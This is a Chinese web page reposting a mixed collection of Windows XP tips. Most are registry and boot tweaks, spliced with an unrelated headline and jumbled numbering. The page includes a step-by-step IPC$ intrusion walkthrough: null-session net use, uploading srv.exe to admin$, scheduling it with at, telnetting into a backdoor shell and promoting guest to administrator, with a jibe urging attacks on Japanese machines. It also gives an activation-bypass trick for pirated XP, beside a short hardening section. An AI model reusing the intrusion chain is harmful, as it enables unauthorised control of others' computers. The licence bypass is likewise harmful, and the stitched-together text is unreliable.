中财网赖昌星案涉案多少官员:电脑经典应用技巧全集(魔鬼增强版)__寻秦风云记
来源:百度文库 编辑:中财网 时间:2024/04/20 15:13:11
2009年12月19日 星期六 6:15AM新竹论坛新竹视聊实用网址大全
网站首页新竹主站宜昌风云市场营销生产管理长江机床
硬件咨讯大话三秦人才市场军事资讯便民服务留 言 板
在对的时间,遇见对的人,是一种幸福 在对的时间,遇见错的人,是一种悲伤 在错的时间,遇见对的人,是无奈`````
当前位置:网站首页 >> 硬件咨讯 >> 电脑经典应用技巧全集(魔鬼增强版) 双击自动滚屏
电脑经典应用技巧全集(魔鬼增强版)
发表日期:2005年11月26日 出处:转 作者:龙 已经有281位读者读过此文
电脑经典应用技巧全集(魔鬼增强版)
1.系统格式转换:convert c:/fs:ntfs回车,系统会提示在当前状态下无法完成,这时要重新启动。输入“Y”,然后Win XP会自动关机,在重启两次以后,再看C盘的属性,已经是NTFS了!整个过程还不到4分钟(转换过程需要的时间与硬盘大小和计算机配置有关)!
2.ip应用:(1).ping hostname
hostname为主机名,通过此命令可以获得名为hostname计算机的IP地址。
(2).ping -a x.x.x.x(已知的IP地址)
如果知道对方计算机的IP地址,通过此命令,可得知对方计算机的主机名。
(3).ping 127.0.0.1
127.0.0.1称为回调地址,通过此命令主要是测试计算机上协议是否安装正确。
2.hostname
获得计算机的主机名。注意:此命令只能在基于NT的计算机上运行,win9x上没有此命令。
3.ipconfig
最常用的就是ipconfig/all,通过此参数几乎可以看出计算机上关于TCP/IP网络的所有配置
5.netstat
用于显示所有的协议状态和当前基于TCP/IP的网络连接。通过netstat -a可以查看当前连接到你计算机的所有其它计算机。
TCP/IP诊断工具(二)
6.关于路由方面的诊断工具:
(1).route
我们知道,当有两个或两个以上的子网连接时,要使网络上的所有计算机都可以互相通信,就必须要使用有路由功能的设备了。对于维护路由器的朋友,此命令最常用的,通过此命令你可以查看、删除和添加当前的路由表。
(2).tracert
维护路由器时使用的工具,可以查看访问远程计算机时要经过那些路由器或网关,有兴趣的朋友可以通过tracert 。
7.arp
3.xp瘦身: 一、瘦身行动
1、在各种软硬件安装妥当之后,其实XP需要更件的时候就很少了。删除系统备份文件吧:开始→运行→sfc.exe /purgecache近3xxM。
2、删除驱动备份:%windows%\driver cache\i386目录下的driver.cab文件,通常这个文件是76M。
3、偶没有看help的习惯,所以保留着%windows%\help目录下的东西对我来说是一种伤害,呵呵。。。都干掉,近4xM。
4、一会在升级完成后你还会发现%windows%\多了许多类似$NtUninstallQ311889$这些目录,都干掉吧,1x-3xM。
修改注册表来减少预读取,减少进度条等待时间,效果是进度条跑一圈就进入登录画面了,开始→运行→regedit启动注册表编辑器,找HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters,有一个键EnablePrefetcher把它的数值改为“1”就可以了。另外不常更换硬件的朋友可以在系统属性中把总线设备上面的设备类型设置为none(无)。
二,nbtstat
该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接,使用这个命令你可以得到远程主机的NETBIOS信息,比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。
-a 使用这个参数,只要你知道了远程主机的机器名称,就可以得到它的NETBIOS信息如图3(下同)。
-A 这个参数也可以得到远程主机的NETBIOS信息,但需要你知道它的IP。
-n 列出本地机器的NETBIOS信息。
当得到了对方的IP或者机器名的时候,就可以使用nbtstat命令来进一步得到对方的信息了,这又增加了我们入侵的保险系数。
三,netstat
这是一个用来查看网络状态的命令,操作简便功能强大。
-a 查看本地机器的所有开放端口,可以有效发现和预防木马,可以知道机器所开的服务等信息,如图4。
这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。用法:netstat -a IP。
-r 列出当前的路由信息,告诉我们本地机器的网关、子网掩码等信息。用法:netstat -r IP。
四,tracert
跟踪路由信息,使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途径,这对我们了解网络布局和结构很有帮助。
这里说明数据从本地机器传输到192.168.0.1的机器上,中间没有经过任何中转,说明这两台机器是在同一段局域网内。用法:tracert IP。
五,net
这个命令是网络命令中最重要的一个,必须透彻掌握它的每一个子命令的用法,因为它的功能实在是太强大了,这简直就是微软为我们提供的最好的入侵工具。首先让我们来看一看它都有那些子命令,键入net /?回车。
在这里,我们重点掌握几个入侵常用的子命令。
net view
使用此命令查看远程主机的所以共享资源。命令格式为net view \\IP。
net use
把远程主机的某个共享资源影射为本地盘符,图形界面方便使用,呵呵。命令格式为net use x: \\IP\sharename。上面一个表示把192.168.0.5IP的共享名为magic的目录影射为本地的Z盘。下面表示和192.168.0.7建立IPC$连接(net use \\IP\IPC$ "password" /user:"name")。
建立了IPC$连接后,呵呵,就可以上传文件了:copy nc.exe \\192.168.0.7\admin$,表示把本地目录下的nc.exe传到远程主机,结合后面要介绍到的其他DOS命令就可以实现入侵了。
net start
使用它来启动远程主机上的服务。当你和远程主机建立连接后,如果发现它的什么服务没有启动,而你又想利用此服务怎么办?就使用这个命令来启动吧。用法:net start servername,如图9,成功启动了telnet服务。
net stop
入侵后发现远程主机的某个服务碍手碍脚,怎么办?利用这个命令停掉就ok了,用法和net start同。
net user
查看和帐户有关的情况,包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的,最重要的,它为我们克隆帐户提供了前提。键入不带参数的net user,可以查看所有用户,包括已经禁用的。下面分别讲解。
1,net user abcd 1234 /add,新建一个用户名为abcd,密码为1234的帐户,默认为user组成员。
2,net user abcd /del,将用户名为abcd的用户删除。
3,net user abcd /active:no,将用户名为abcd的用户禁用。
4,net user abcd /active:yes,激活用户名为abcd的用户。
5,net user abcd,查看用户名为abcd的用户的情况。
net localgroup
查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用户组。在入侵过程中,我们一般利用它来把某个帐户提升为administrator组帐户,这样我们利用这个帐户就可以控制整个远程主机了。用法:net localgroup groupname username /add。
现在我们把刚才新建的用户abcd加到administrator组里去了,这时候abcd用户已经是超级管理员了,呵呵,你可以再使用net user abcd来查看他的状态,和图10进行比较就可以看出来。但这样太明显了,网管一看用户情况就能漏出破绽,所以这种方法只能对付菜鸟网管,但我们还得知道。现在的手段都是利用其他工具和手段克隆一个让网管看不出来的超级管理员,这是后话。有兴趣的朋友可以参照《黑客防线》第30期上的《由浅入深解析隆帐户》一文。
net time
这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面,那么也许就用不到这个命令了。但简单的入侵成功了,难道只是看看吗?我们需要进一步渗透。这就连远程主机当前的时间都需要知道,因为利用时间和其他手段(后面会讲到)可以实现某个命令和程序的定时启动,为我们进一步入侵打好基础。用法:net time \\IP。
六,at
这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序(知道net time的重要了吧?)。当我们知道了远程主机的当前时间,就可以利用此命令让其在以后的某个时间(比如2分钟后)执行某个程序和命令。用法:at time command \\computer。
表示在6点55分时,让名称为a-01的计算机开启telnet服务(这里net start telnet即为开启telnet服务的命令)。
七,ftp
大家对这个命令应该比较熟悉了吧?网络上开放的ftp的主机很多,其中很大一部分是匿名的,也就是说任何人都可以登陆上去。现在如果你扫到了一台开放ftp服务的主机(一般都是开了21端口的机器),如果你还不会使用ftp的命令怎么办?下面就给出基本的ftp命令使用方法。
首先在命令行键入ftp回车,出现ftp的提示符,这时候可以键入“help”来查看帮助(任何DOS命令都可以使用此方法查看其帮助)。
大家可能看到了,这么多命令该怎么用?其实也用不到那么多,掌握几个基本的就够了。
首先是登陆过程,这就要用到open了,直接在ftp的提示符下输入“open 主机IP ftp端口”回车即可,一般端口默认都是21,可以不写。接着就是输入合法的用户名和密码进行登陆了,这里以匿名ftp为例介绍。
用户名和密码都是ftp,密码是不显示的。当提示**** logged in时,就说明登陆成功。这里因为是匿名登陆,所以用户显示为Anonymous。
1、加快XP开机及关机速度
在〔开始〕→〔运行〕→键入〔Regedit〕
找到HKEY_CURRENT_USER\Control Panel\Desktop键,将右边窗口的WaitToKillAppTimeout改为1000
(原设定值:20000 )即关闭程序时仅等待1秒。
将键值HungAppTimeout的数值改为:200(原设定值:5000 ),表示程序出错时等待0.5秒。
找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control
将键值WaitToKillServiceTimeout设为:1000或更小。(原设定值:20000 )
将键值〔HungAppTimeout〕的数值资料更改为〔200〕
2、加快预读能力改善开机速度
Windows XP预读设定可提高系统速度,加快开机速度。
在〔开始〕→〔运行〕→键入〔Regedit〕找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\ MemoryManagement在PrefetchParameters右边窗口将〔EnablePrefetcher〕的数值资料如下更改:
PIII 800MHz以上的可尝试将数值资料更改为〔4〕或〔5〕
以下的建议保留数值资料为预设值即〔3〕
3、关机时自动关闭停止回应程序
让系统自动关闭停止回应的程序。
打开注册表HKEY_CURRENT_USER\Control Panel\Desktop键,将AutoEndTasks值设为1。(原设定值:0 )
4、在启动电脑时运行Defrag程序
在〔开始〕→〔运行〕→键入〔Regedit〕→〔HKEY_LOCAL_MACHINE〕
→〔SOFTWARE〕→〔Microsoft〕→〔Dfrg〕→〔BootOptimizeFunction〕
将键值〔Enable〕设定为〔Y〕等于开启而设定为〔N〕等于关闭
5、减少多重启动时等待时间
打开开始\控制面板\系统\进阶\启动及修复项目\按设定\系统启动\预设操作系统--两个项目都打勾-填入您想等待的时间ps :假如填入"0"系统将不会让您等待而直接载入您上次选定的操作系统
另一个方法
用Notepad打开在C:\目录下的boot.ini档案,将内容〔timeout〕的设定值由预设的30 (秒)改为要求等待的时间--存档
6、减少Windows XP开机载入区域网络时等待的时间
打开网络连接
用右键查看“本地连接”的“属性”
在一般下面,选“Internet协议(TCP/IP)”按内容
使用固定的IP地址,以后开机就不会停顿了
7、使用微软Bootvis.exe最佳化启动速度
先下载bootVis.exe档案,然后解压后运行〔bootvis.exe〕
在〔Trace〕选〔next boot + driver delays〕或其他选择项目后XP会重新启动并将记录启动资料产生成BIN的文件。
再在〔Bootvis.exe〕→〔file〕→〔open〕中打开这个文件→在〔Trace〕→选〔Optimize system〕
此优化需时颇长,请耐心等待
8、移除启动时载入不需要的程序
如开机时太多程序要运行时会影响开机的速度,先检查那些程序会在开机时运行
在〔开始〕→〔运行〕→键入〔msconfig〕→选〔启动〕
在启动内的程序是代表开机时要运行的程序,如须暂时停止运行某些程序便取消在〔□〕的〔X〕符号便可,如想恢复开机时运行此程序在〔□〕内加回〔X〕符号便可
如希望彻底移除者在〔msconfig〕→〔启动〕的左边栏〔位置〕上便显示引导程序运行的位置
其中:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
其中的〔HKLM〕代表登录档上的〔HKEY_LOCAL_MACHINE〕
在〔Run〕的右边窗口不需要的项目删除
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
其中的〔HKCU〕代表登录档上的〔HKEY_CURRENT_USER〕
在〔Run〕的右边窗口不需要的项目删除
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
则代表登录档的路径如下
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg
检查在〔startupreg〕下的路径,将不需要的项目删除
Common Startup
代表在〔开始〕→〔所有程序〕→〔启动〕的程序
只要在取消在〔msconfig〕→〔启动〕内〔□〕不选〔X〕符号便会代为将程序移离〔启动〕
9、加快开机的时间-停用不需要的服务
Windows在开机时会先载入很多不见得用得到的程序,以下的方法可以让您选择您需要载入的程序,但如您非系统高手不建议您动这个项目:
关掉一些伴随着Windows启动的程序,及常驻程序!!在"开始"--> "运行"中
输入msconfig进入"系统设定公用程序"在"启动"关掉不必要的程序,将方框中的勾勾取消,关掉不
必要的程序,不确定的程序不可以乱关,以免造成Windows错误!!
(先试试是否可以在软件本身取消常驻,不行再用此方法!!),完成后按"套用",重开机!!
10、制做XP开机磁盘
XP要做开机磁盘
把磁盘插入软驱-->按右键-->选格式化-->选建立一个MS-DOS开机磁盘
11、XP的自动关机问题
如果不能自动关机的话
控制面板-->电源-->显示-->屏幕保护程序-->电源管理-->APM打勾
这样应该就可以了
如果还不行,应该是BIOS的问题
12、关机有文本文档
在桌面空白位置按鼠标右键-> <新建> -> 选<文本文档>
键入rundll.exe user.exe,exitwindows
在<选择文本文档的名称>键入<关闭Window>或你想要的名称-> 按<完成>
13、重新启动有文本文档
在桌面空白位置按鼠标右键-> <新建> -> 选<文本文档>
在<命令行>键入rundll.exe user.exe,exitwindowsexec
在<选择文本文档的名称>键入<重新启动Restart>或你想要的名称-> 按<完成>
14、备份及还原窗口启动档
如需重装Windows XP,重装后必须重新启动,如按下列办法可解决此问题
备份
在\Windows\system32目录下将wpa.dbl及Wpa.bak用软盘备份
还原
重装Windows XP后,进入〔安全模式〕,在\Windows\system32目录下将wpa.dbl改名为wpadbl及wpa.bak改名为wpabak
然后将备份的wpa.dbl及Wpa.bak抄回此目录。
重新启动电脑按〔检查Windows XP是否登记〕办法更改登录注册
注:因Windows XP对硬件的更改次数有所限制,所以只适用于重装系统或小量更改硬件。
15、修复Windows XP的启动
由于在安装Windows XP后再安装其他版本的Windows而导致启动后不能进入Windows XP。
原因是当安装其他版本的Windows时,C盘的已被新安装的其他版本Windows取替,除了用其他的软件外,可尝试按以下办法进行修改,此更改不会提供任何支持及仅适用于FAT32格式,Windows 2000因系统较接近Windows XP,因此成功机会大,如属Windows 98或Windows ME未能成功修复者,可使用有关版本的启动磁盘启动电脑后在〔A:\>〕下键入〔Sys :〕后从新开机便可。
被Windows 98或ME占用了启动系统
先预备一张Win98的安装启动磁片。
进入Windows 98或ME用Notepad去编辑一个名为Read.scr内容如下。
-------------------------
L 100 2 0 1
N C:\BOOTSECT.DOS
R BX
0
R CX
200
W
Q
--------------------------
将档案存在Windows 98或ME的安装启动磁片及用此磁片启动电脑
如果C盘下有个名为BOOTSECT.DOS的档案便在A:>下先运行此命令
ATTRIB C:\BOOTSECT.DOS -S -H -R
然后在A:>下键入DEBUG
如刚才修改了BOOTSECT.DOS档案的属性再在A:>下先运行此命令:
ATTRIB C:\BOOTSECT.DOS+S+H+R
在BIOS设定用CD启动电脑,然后将Windows XP光盘放入及启动电脑。
让光盘自动运行至停止便会出现三个选择,按〔R〕选修复电脑便会询问要进入哪个系统,选中你要进入的系统按〔Enter〕键,然后输入Administrator密码(与安装时输入的Administrator密码相同)如果没有密码直接按Enter便可。
在X:\Windows> 下键入Fixboot及按〔Y〕确认。
X = Windows XP所安装驱动器的盘符。
完成后取出Win XP光盘及键入〔Exit〕会重新启动电脑。
在BIOS选回用硬盘启动电脑便可。
如未能正常显示多重启动选单者可修改C盘根目录的Boot.ini档案。
XP一分钟变正版真正XP正版
1。必需安装XP原版,其它版我没试过,有兴趣你们试一试。
2。双击解压出来的文件XP文件
3。点击开始栏→选运行→输入regedit
4。找出Hkey_Local_Machine\Software\Microsoft\WindowsNT\CurrentVersion\WPAEvents
5。右击注册表中“WPAEvents”键→“权限”→选择列表中的“system”下方出现拒绝那一栏下面有两个小方格,请勾上。
6。确定,退出。
7。恭喜你,你XP已经是正版了,你不信?请点击激活。或运行oobe/msoobe /a试试。
8。你可以无限升级,升级SP1~SPN都行了,哈哈~!
巧妙安装各种Windows操作系统
对于新购置的电脑,在完成对硬盘的分区、格式化操作以后,就需要进行Windows系统的安装了。下面就来介绍一下Windows各种版本的安装方法。
安装Windows 98
新安装Windows 98系统,可以使用Windows 98系统启动盘启动计算机,然后将Windows 98安装光盘放入光驱,在DOS提示符状态下,进入光盘所在驱动器,然后进入Windows 98安装目录,运行Setup命令即可开始安装Windows 98。
在开始安装时,安装程序会自动调用Scandisk程序对电脑系统进行检测,检测通过后即进入Windows 98安装程序。当屏幕上出现“软件许可协议”对话框时,单击选中“接受协议”选项并单击“下一步”按钮,这时会要求你输入“产品密钥”,也就是我们常说的Windows 98安装序列号,完成后单击“下一步”按钮进行安装。
Windows 98安装程序进入“正在收集计算机的相关信息”界面,并对系统进行检查,以确保有足够的硬盘空间来安装Windows 98。完成后,即可按照提示,单击“下一步”按钮,选择“典型安装”方式,输入用户名和单位名称后,进入用户区域选择窗口,区域的选择主要是确定操作系统的系统时间以及日期,可以在列表中选择“中国”,然后单击“下一步”按钮。
在安装过程中,安装程序会询问用户是否创建启动盘,如果你还没有自己的Windows 98启动盘,那么建议选择“确定”按钮创建,否则单击“取消”按钮。在接下来的过程中,就不必我们为之操心了,安装程序会向硬盘拷贝数据,并完成最后的安装过程。文件复制结束后,会提示重新启动计算机,重启后,即可直接进入Windows 98安装程序,并在左侧显示安装剩余时间,耐心地等待过后,你就会发现,Windows 98已经被安装到系统中了。
小技巧:
往往我们在安装Windows 98时,通常会在命令行状态下输入Setup命令进行安装,然后运行Scandisk、扫描磁盘、制作启动盘、安装版本说明等过程,如果打算要Windows快些安装,可以在使用Setup命令的时候,使用一些参数,从而达到快速安装Windows 98的目的。Setup的参数主要包括以下几个参数:
/t:tmp:指定存放临时文件的目录
/id:跳过磁盘空间检查
/ie:不制作启动盘
/ih:不检查注册表
/im:跳过内存检查
/is:不执行磁盘扫描
/iv:安装时不显示版本说明
我们想快速安装Windows 98,就可以输入命令:setup /id/ie/ih/im/is/iv,这样安装程序就会直接进入文件复制过程,从而省下了大量的安装时间。
安装Windows Me
Windows Me的安装可分为升级安装和完全安装两种类型,Windows Me可以从Windows 95、Windows 98和Windows 98 SE上直接升级安装,但不能从Windows 3.x中升级。
Windows Me提供了三种安装方式,一是使用启动盘启动计算机,并进入安装目录执行Setup程序,需要注意的是,在执行安装程序之前,需要首先运行和加载磁盘高速缓存程序Smartdrv.exe。第二种方式是使用Windows Me光盘启动,自动执行安装程序。第三种方式是,在当前的操作系统中运行Windows Me的安装程序,比如在Windows 98系统中直接运行安装程序。
无论采用哪种安装方式,其操作过程基本都是一样的,与前面介绍的Windows 98安装程序类似。
如果你的电脑主频低于150MHz,那么会出现“在计算机上无法安装Windows,因为处理器低于150MHz,单击'确定’退出安装程序”的提示,这时不要着急,可以输入命令:setup/nm即可开始安装了。
另外,Windows Me的安装程序也存在一些参数(同Windows 98)。
安装Windows 2000和Windows XP
Windows 2000系统的安装可以在DOS和Windows 9x系统下直接安装,在光驱中放入Windows 2000安装盘后,会自动运行Windows 2000安装程序。选择全新安装后,会要求输入产品序列号,然后即可开始复制安装文件并重新启动计算机。
在重新启动后的界面中,按下回车键则可以开始安装Windows 2000,并进入安装目录选择窗口,同时选择需要安装的盘符。在接下来的窗口中,会要求选择文件系统的格式,为了可以高效发挥Windows 2000系统性能,建议选择“将磁盘分区转换为NTFS”,完成后按下回车键即可根据向导提示完成Windows 2000系统的安装了。
Windows XP安装方式包括三种,分别是升级安装、双系统共存安装和全新安装。它的安装方法与Windwos 2000系统安装方法类似,这里就不多做介绍了。
如果是在DOS方式下安装Windows 2000/XP系统,首先需要运行Smartdrv.exe命令,这样才能使安装程序可以快速地安装,否则等待的时间将是非常漫长的。
首先,我们用Windows 98启动盘启动电脑进入DOS模式,再执行Smartdrv.exe(如果软盘里没有该文件,可以从Windows 98的安装目录下的Command目录中获取)即可载入。然后执行Windows 2000/XP安装光盘中的i386目录下的Winnt.exe文件,记住:这里不是执行Setup.exe,而是Winnt.exe。以后的操作就比较简单了。
安装多个操作系统
在电脑中同时安装Windows 98和Windows 2000系统,可以首先安装Windows 98,然后在Windows 98系统中运行Windows 2000安装程序,这样就可以在计算机启动界面出现多重启动菜单,移动上下光标键并回车后即可选择进入相应的系统了。如果你打算让Windows Me系统与Windows 2000共存,最简单的方法是先安装好Windows Me,然后用Windows 98启动盘或者从光盘启动,安装Windows 2000,安装时选择“全新安装”方式。
如果你打算让Windows 98、Windows 2000和Windows XP共存,可以首先安装Windows 98,然后在Windows 98下安装Windows 2000系统,最后在Windows 2000下安装Windows XP系统,在完成安装后即可形成多重启动菜单了。
七 如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)
2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师
5设置复杂密码,防止通过ipc$穷举密码
(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net)
八 相关命令
1)建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
2)建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)
3)映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$
4)删除一个ipc$连接
net use \\IP\ipc$ /del
5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活
11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
十 总结:
关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.
最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,如果你非想试一下,建议拿小日本的机子开练(什么?为什么?因为我讨厌日本,没别的)
学会使用Windows XP的远程关机
[ 作者:佚名 | 转贴自:eNet稻草飞飞 | 点击数:191 | 更新时间:2004-7-27 | 文章录入:晨光 ]
在Windows XP中,新增了一条命令行工具“shutdown”,其作用是“关闭或重新启动本地或远程计算机”。利用它,我们不但可以注销用户,关闭或重新启动计算机,还可以实现定时关机、远程关机。
该命令的语法格式如下:
shutdown [-i -l -s -r -a] [-f] [-m [\\ComputerName> [-t xx] [-c "message"] [-d[u][p]:xx:yy] 其中,各参数的含义为:
-i 显示图形界面的对话框。
-l 注销当前用户,这是默认设置。-m ComputerName 优先。
-s 关闭计算机。
-r 关闭之后重新启动。
-a 中止关闭。除了 -l 和 ComputerName 外,系统将忽略其它参数。在超时期间,您只可以使用 -a。
-f 强制运行要关闭的应用程序。
-m [\\ComputerName] 指定要关闭的计算机。
-t xx 将用于系统关闭的定时器设置为 xx 秒。默认值是 20 秒。
-c "message" 指定将在“系统关闭”窗口中的“消息”区域显示的消息。最多可以使用 127 个字符。引号中必须包含消息。
-d [u][p]:xx:yy 列出系统关闭的原因代码。
首先,我们来看一下该命令的一些基本用法:
1、注销当前用户
shutdown - l
该命令只能注销本机用户,对远程计算机不适用。
2、关闭本地计算机 shutdown - s
3、重启本地计算机
shutdown - r
4、定时关机
shutdown - s -t 30
指定在30秒之后自动关闭计算机。
5、中止计算机的关闭
有时我们设定了计算机定时关机后,如果出于某种原因又想取消这次关机操作,就可以用 shutdown - a 来中止。如:
shutdown -s C t 300 设定计算机在5分钟后关闭。
Shutdown C a 取消上述关机操作。
以上是shutdown命令在本机中的一些基本应用。前面我们已经介绍过,该命令除了关闭、重启本地计算机外,更重要的是它还能对远程计算机进行操作,但是如何才能实现呢?
在该命令的格式中,有一个参数[-m [\\ComputerName],用它可以指定将要关闭或重启的计算机名称,省略的话则默认为对本机操作。于是,我用以下命令试了一下:
shutdown Cs Cm \\netproxy -t 30
(在30秒内关闭计算机名为netproxy的机器;注:netproxy为局域网内一台同样装有Windows XP的电脑)
但该命令执行后,计算机netproxy一点反应都没有,我的屏幕上却返回这样一句话:Access is denied (拒绝访问)。
为什么会出现这种情况呢?我想了半天,四处查找有关的资料,终于发现,在Windows XP默认的安全策略中,只有管理员组的用户才有权从远端关闭计算机,而一般情况下我们从局域网内的其他电脑来访问该计算机时,则只有guest用户权限,所以当我们执行上述命令时,便会出现“拒绝访问”的情况。
找到问题的根源之后,解决的办法也很简单,只要在客户计算机(能够被远程关闭的计算机,如上述的netproxy)中赋予guest用户远程关机的权限即可。这可利用Windows XP的“组策略”或“管理工具”中的“本地安全策略”来实现。下面以“组策略”为例进行介绍:
1、单击“开始”按钮,选择“运行”,在对话框中输入“gpedit.msc”,然后单击“确定”,打开“组策略编辑器”。
2、在“组策略”窗口的左窗格中打开“计算机配置”—“Windows 设置”—“安全设置”—“本地策略”—“用户权利指派”。(如图)
3、在“组策略”窗口的右窗格中选择“Force shutdown from a remote system (从远端系统强制关机)”,双击。
4、在弹出的对话框中显示目前只有“Administrators”组的成员才有权从远程关机;单击对话框下方的“添加用户或组”按钮,然后在新弹出的对话框中输入“guest”,再单击“确定”。
5、这时在“从远端系统强制关机”的属性中便添加了一个“guest”用户,单击“确定”即可。
6、关闭“组策略”窗中。
通过上述操作后,我们便给计算机netproxy的guest用户授予了远程关机的权限。以后,我们要远程关闭计算机netproxy,只要在网络中其他装有Windows XP 的电脑中输入以下命令即可:
shutdown -s Cm \\netproxy -t 30 (其他参数用法同上)
这时,在netproxy计算机的屏幕上将显示一个“系统关机”的对话框,提示“系统即将关机。请保存所有正在运行的工作,然后注销。未保存的改动将会丢失。关机是由netproxy\guest初始的。”在对话框下方还有一个计时器,显示离关机还有多少时间。在等待关机的时间里,用户还可以执行其他的任务,如关闭程序、打开文件等,但无法关闭该对话框,除非你用shutdown Ca命令来中止关机任务。
最后,有一点要说明的是,shutdown命令不但可以远程关闭装有Windows XP系统的计算机,它还可以远程关闭装有Windows 2000系统的计算机(对于Win9X嘛,好像不适用)。有关Windows 2000客户计算机上的一些设置,操作方法同上,这里就不再多说了。
另外shutdown作为一个外部命令(其对应文件为\Windows\system32文件夹下的shutdown.exe),我们还可将它复制到Windows 2000的机器上,这样,在装有Windows 2000系统的机器之间便也能相互实现远程关机。
4、加快宽带连接速度
〔开始〕→〔运行〕→键入〔gpedit.msc〕打开〔本地计算机策略〕→〔计算机配置〕→〔管理模板〕→〔Network〕→在右边窗口打开〔QoS Packet Scheduler〕→〔limit reservable bandwidth〕→选〔已启用〕→将〔Bandwidth limit %" 〕的数据改为〔0〕→重新启动电脑即可
家用版可按下运行
〔开始〕→〔运行〕→键入〔regedit〕→在〔HKEY_LOCAL_MACHINE〕→〔SOFTWARE〕→〔Policies〕→〔Microsoft〕 →〔Windows〕
增加一个名为〔Psched〕的键值
〔Psched〕右面窗口增加一个 Dword 值〔NonBestEffortLimit〕数值资料为〔0〕
5、加快选单显示速度
〔开始〕→〔运行〕→键入〔Regedit〕→〔HKEY_CURRENT_USER〕→〔Control Panel〕→〔Desktop〕→将字串值〔MenuShowDelay〕的数值资料更改为〔0〕
调整後如觉得菜单显示速度太快而不适应者可将〔MenuShowDelay〕的数值资料更改为〔200〕
重新开机便生效
6、加快自动更新率
